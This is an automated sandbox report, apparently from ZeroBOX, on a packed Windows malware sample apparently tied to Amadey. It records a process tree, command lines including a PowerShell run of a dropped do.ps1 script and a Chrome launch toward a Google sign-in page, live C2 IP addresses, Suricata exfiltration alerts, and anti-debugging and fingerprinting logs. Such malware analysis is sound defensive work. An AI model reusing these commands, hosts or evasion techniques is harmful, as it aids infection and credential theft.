Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Sept. 22, 2024, 3:09 p.m.	Sept. 22, 2024, 3:12 p.m.

Size	1.8MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`697b27aac08e83e9e231721e7a03ae86`
SHA256	`83a230c3297cef0bba8647992409cba4c228e0221def6c651c9bea434a96ef26`
CRC32	`9F7FFCB4`
ssdeep	`24576:z/oeSusCIZC608wd2Au63yl1fSVZSzZQGPCM7A8/F+GyF53QMrZS1xCYevAUl:zAeXsvI8DAuYy/2SzuGPCM7ArkSqav5`
Yara	themida_packer - themida packer PE_Header_Zero - PE File Signature IsPE32 - (no description) UPX_Zero - UPX packed file

nate.exe "C:\Users\test22\AppData\Local\Temp\nate.exe"
884
- svoutse.exe "C:\Users\test22\AppData\Local\Temp\0e8d0864aa\svoutse.exe"
  2216
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\1000055041\do.ps1"
    2436
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
      2540
      - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef3f36e00,0x7fef3f36e10,0x7fef3f36e20
        2596
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
185.215.113.103	Active	Moloch
31.41.244.10	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 31.41.244.10:80 -> 192.168.56.103:49164	2400001	ET DROP Spamhaus DROP Listed Traffic Inbound group 2	Misc Attack
TCP 192.168.56.103:49164 -> 31.41.244.10:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 185.215.113.103:80	2032162	ET INFO PS1 Powershell File Request	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 22, 2024, 3:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 22, 2024, 3:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 22, 2024, 3:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 22, 2024, 3:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 22, 2024, 3:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 22, 2024, 3:09 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (50 out of 83 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:09 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:10 p.m.			0	0
IsDebuggerPresent Sept. 22, 2024, 3:10 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (40 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e99b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e99b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e99b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e91b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e91b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e91b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e91b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e91b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e91b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9c30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9c30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9c30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9c30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9c30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9c30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e99b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9c30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9c30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9c30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9c30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9c30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9c30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9c30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9d70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 22, 2024, 3:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e9d70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (1 event)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 22, 2024, 3:09 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (6 events)

section	\x00
section	.idata
section
section	lyxnysfk
section	vmowfaqr
section	.taggant

One or more processes crashed (50 out of 237 events)

Time & API	Arguments	Status
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc exception.symbol: nate+0x31a0b9 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 3252409 exception.address: 0x12aa0b9 registers.esp: 4194112 registers.edi: 0 registers.eax: 1 registers.ebp: 4194128 registers.edx: 21291008 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb e9 bf 01 00 00 81 eb b2 57 e9 7b 5d 87 1c 24 exception.symbol: nate+0x6d228 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 447016 exception.address: 0xffd228 registers.esp: 4194076 registers.edi: 1971192040 registers.eax: 16764432 registers.ebp: 4006785044 registers.edx: 16318464 registers.ebx: 16771869 registers.esi: 3 registers.ecx: 1971388416	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 0c 24 c7 04 24 fc ab fd 4b c1 2c exception.symbol: nate+0x6d181 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 446849 exception.address: 0xffd181 registers.esp: 4194080 registers.edi: 241897 registers.eax: 16766867 registers.ebp: 4006785044 registers.edx: 0 registers.ebx: 16771869 registers.esi: 3 registers.ecx: 1971388416	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 55 56 89 3c 24 53 bb 3b 82 3e 67 e9 ac 00 00 exception.symbol: nate+0x6e37f exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 451455 exception.address: 0xffe37f registers.esp: 4194080 registers.edi: 0 registers.eax: 30269 registers.ebp: 4006785044 registers.edx: 16771598 registers.ebx: 1259 registers.esi: 3 registers.ecx: 1971388416	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 52 89 e2 68 a3 fc 3a 3d e9 18 fa ff ff 81 ec exception.symbol: nate+0x1f2bcc exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2042828 exception.address: 0x1182bcc registers.esp: 4194076 registers.edi: 16804570 registers.eax: 30665 registers.ebp: 4006785044 registers.edx: 2345 registers.ebx: 425984 registers.esi: 18358823 registers.ecx: 18359328	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb e9 7b f3 ff ff 05 04 00 00 00 87 04 24 5c 56 exception.symbol: nate+0x1f30c1 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2044097 exception.address: 0x11830c1 registers.esp: 4194080 registers.edi: 16804570 registers.eax: 30665 registers.ebp: 4006785044 registers.edx: 2345 registers.ebx: 425984 registers.esi: 18358823 registers.ecx: 18389993	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 68 97 25 63 47 89 04 24 b8 58 b5 7d 7d bb fd exception.symbol: nate+0x1f3036 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2043958 exception.address: 0x1183036 registers.esp: 4194080 registers.edi: 0 registers.eax: 30665 registers.ebp: 4006785044 registers.edx: 2345 registers.ebx: 425984 registers.esi: 478761552 registers.ecx: 18362729	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 81 c3 0a f7 df 3f 03 1c 24 52 c7 04 24 2b f3 exception.symbol: nate+0x1f8452 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2065490 exception.address: 0x1188452 registers.esp: 4194076 registers.edi: 146790898 registers.eax: 28296 registers.ebp: 4006785044 registers.edx: 3548472850 registers.ebx: 18382925 registers.esi: 18380726 registers.ecx: 2005788296	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb e9 69 f9 ff ff 56 89 0c 24 e9 5b ff ff ff 01 exception.symbol: nate+0x1f8837 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2066487 exception.address: 0x1188837 registers.esp: 4194080 registers.edi: 146790898 registers.eax: 28296 registers.ebp: 4006785044 registers.edx: 3548472850 registers.ebx: 18411221 registers.esi: 18380726 registers.ecx: 2005788296	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 50 89 3c 24 89 e7 53 68 04 00 00 00 5b 01 df exception.symbol: nate+0x1f85e9 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2065897 exception.address: 0x11885e9 registers.esp: 4194080 registers.edi: 146790898 registers.eax: 28296 registers.ebp: 4006785044 registers.edx: 0 registers.ebx: 18385761 registers.esi: 18380726 registers.ecx: 50665	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 50 e9 6e 03 00 00 81 e8 01 00 00 00 0f 85 b6 exception.symbol: nate+0x1fb6f7 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2078455 exception.address: 0x118b6f7 registers.esp: 4194076 registers.edi: 146790898 registers.eax: 30711 registers.ebp: 4006785044 registers.edx: 18396030 registers.ebx: 1785625472 registers.esi: 18380726 registers.ecx: 1785625472	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb e9 d6 fe ff ff c7 04 24 00 38 f1 13 89 3c 24 exception.symbol: nate+0x1fb70a exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2078474 exception.address: 0x118b70a registers.esp: 4194080 registers.edi: 146790898 registers.eax: 0 registers.ebp: 4006785044 registers.edx: 18398741 registers.ebx: 1785625472 registers.esi: 202985 registers.ecx: 1785625472	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 e9 28 46 00 00 89 cd 59 exception.symbol: nate+0x202682 exception.instruction: in eax, dx exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2107010 exception.address: 0x1192682 registers.esp: 4194072 registers.edi: 8269542 registers.eax: 1447909480 registers.ebp: 4006785044 registers.edx: 22104 registers.ebx: 1971327157 registers.esi: 18420183 registers.ecx: 20	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb exception.symbol: nate+0x2019db exception.address: 0x11919db exception.module: nate.exe exception.exception_code: 0xc000001d exception.offset: 2103771 registers.esp: 4194072 registers.edi: 8269542 registers.eax: 1 registers.ebp: 4006785044 registers.edx: 22104 registers.ebx: 0 registers.esi: 18420183 registers.ecx: 20	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 9c 27 2d 12 01 exception.symbol: nate+0x2056bb exception.instruction: in eax, dx exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2119355 exception.address: 0x11956bb registers.esp: 4194072 registers.edi: 8269542 registers.eax: 1447909480 registers.ebp: 4006785044 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 18420183 registers.ecx: 10	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: cd 01 eb 00 66 8b f0 6a 00 50 e8 03 00 00 00 20 exception.symbol: nate+0x209bff exception.instruction: int 1 exception.module: nate.exe exception.exception_code: 0xc0000005 exception.offset: 2137087 exception.address: 0x1199bff registers.esp: 4194040 registers.edi: 0 registers.eax: 4194040 registers.ebp: 4006785044 registers.edx: 726319406 registers.ebx: 18455883 registers.esi: 12594 registers.ecx: 773128192	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb ba 47 ff bf 5f 81 ec 04 00 00 00 e9 9e f8 ff exception.symbol: nate+0x20aa8d exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2140813 exception.address: 0x119aa8d registers.esp: 4194080 registers.edi: 8269542 registers.eax: 32628 registers.ebp: 4006785044 registers.edx: 2130561854 registers.ebx: 18489184 registers.esi: 773128192 registers.ecx: 773128192	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 55 57 89 e7 81 c7 04 00 00 00 81 ef 04 00 00 exception.symbol: nate+0x20abf8 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2141176 exception.address: 0x119abf8 registers.esp: 4194080 registers.edi: 8269542 registers.eax: 6379 registers.ebp: 4006785044 registers.edx: 0 registers.ebx: 18459700 registers.esi: 773128192 registers.ecx: 773128192	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 81 c3 5d 68 fe 7f 81 c3 e7 7e dc 5f 81 c3 8c exception.symbol: nate+0x211f27 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2170663 exception.address: 0x11a1f27 registers.esp: 4194076 registers.edi: 8269542 registers.eax: 28461 registers.ebp: 4006785044 registers.edx: 773128192 registers.ebx: 18487193 registers.esi: 773128192 registers.ecx: 18470989	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 68 9e 35 04 14 89 1c 24 e9 3e 03 00 00 81 c6 exception.symbol: nate+0x2118fe exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2169086 exception.address: 0x11a18fe registers.esp: 4194080 registers.edi: 6744407 registers.eax: 0 registers.ebp: 4006785044 registers.edx: 773128192 registers.ebx: 18490406 registers.esi: 773128192 registers.ecx: 18470989	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 56 89 1c 24 50 e9 17 ff ff ff 87 04 24 5c e9 exception.symbol: nate+0x2207ad exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2230189 exception.address: 0x11b07ad registers.esp: 4194072 registers.edi: 18580555 registers.eax: 32478 registers.ebp: 4006785044 registers.edx: 6 registers.ebx: 43113 registers.esi: 1988020814 registers.ecx: 6	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 51 57 e9 07 01 00 00 50 89 14 24 e9 7e f7 ff exception.symbol: nate+0x220ed6 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2232022 exception.address: 0x11b0ed6 registers.esp: 4194072 registers.edi: 18580555 registers.eax: 32478 registers.ebp: 4006785044 registers.edx: 4294937660 registers.ebx: 43113 registers.esi: 9365842 registers.ecx: 6	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 68 3a bd 96 48 89 34 24 89 2c 24 50 68 ee d4 exception.symbol: nate+0x2215e4 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2233828 exception.address: 0x11b15e4 registers.esp: 4194068 registers.edi: 18580555 registers.eax: 31277 registers.ebp: 4006785044 registers.edx: 18551129 registers.ebx: 43113 registers.esi: 9365842 registers.ecx: 744010481	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb e9 78 00 00 00 58 e9 84 00 00 00 55 ff 74 24 exception.symbol: nate+0x221299 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2232985 exception.address: 0x11b1299 registers.esp: 4194072 registers.edi: 0 registers.eax: 31277 registers.ebp: 4006785044 registers.edx: 18553830 registers.ebx: 43113 registers.esi: 9365842 registers.ecx: 32696657	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb e9 e5 f9 ff ff bd f7 1b f7 5e 57 bf 01 00 00 exception.symbol: nate+0x225c7f exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2251903 exception.address: 0x11b5c7f registers.esp: 4194068 registers.edi: 0 registers.eax: 18567947 registers.ebp: 4006785044 registers.edx: 2130566132 registers.ebx: 371490197 registers.esi: 9365842 registers.ecx: 773128192	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb e9 1a 05 00 00 31 54 24 04 e9 13 04 00 00 51 exception.symbol: nate+0x225675 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2250357 exception.address: 0x11b5675 registers.esp: 4194072 registers.edi: 0 registers.eax: 18598048 registers.ebp: 4006785044 registers.edx: 4294940228 registers.ebx: 84201 registers.esi: 9365842 registers.ecx: 773128192	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 56 54 e9 67 fc ff ff 81 c3 04 00 00 00 81 c3 exception.symbol: nate+0x23096a exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2296170 exception.address: 0x11c096a registers.esp: 4194072 registers.edi: 397194780 registers.eax: 1392536160 registers.ebp: 4006785044 registers.edx: 2130566132 registers.ebx: 18606336 registers.esi: 0 registers.ecx: 18614904	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 52 e9 2d 00 00 00 29 ea 8b 2c 24 51 e9 e5 fe exception.symbol: nate+0x24369a exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2373274 exception.address: 0x11d369a registers.esp: 4194040 registers.edi: 18690439 registers.eax: 28149 registers.ebp: 4006785044 registers.edx: 18717340 registers.ebx: 0 registers.esi: 18688322 registers.ecx: 0	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 50 c7 04 24 e6 6b fd 6f e9 21 07 00 00 55 bd exception.symbol: nate+0x242f16 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2371350 exception.address: 0x11d2f16 registers.esp: 4194040 registers.edi: 0 registers.eax: 28149 registers.ebp: 4006785044 registers.edx: 18692176 registers.ebx: 0 registers.esi: 3344388689 registers.ecx: 0	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 81 ea 67 7a 8f 3c 55 bd e4 5c bf 3b e9 54 00 exception.symbol: nate+0x24411c exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2375964 exception.address: 0x11d411c registers.esp: 4194036 registers.edi: 0 registers.eax: 27772 registers.ebp: 4006785044 registers.edx: 18692371 registers.ebx: 1458033363 registers.esi: 3344388689 registers.ecx: 0	1
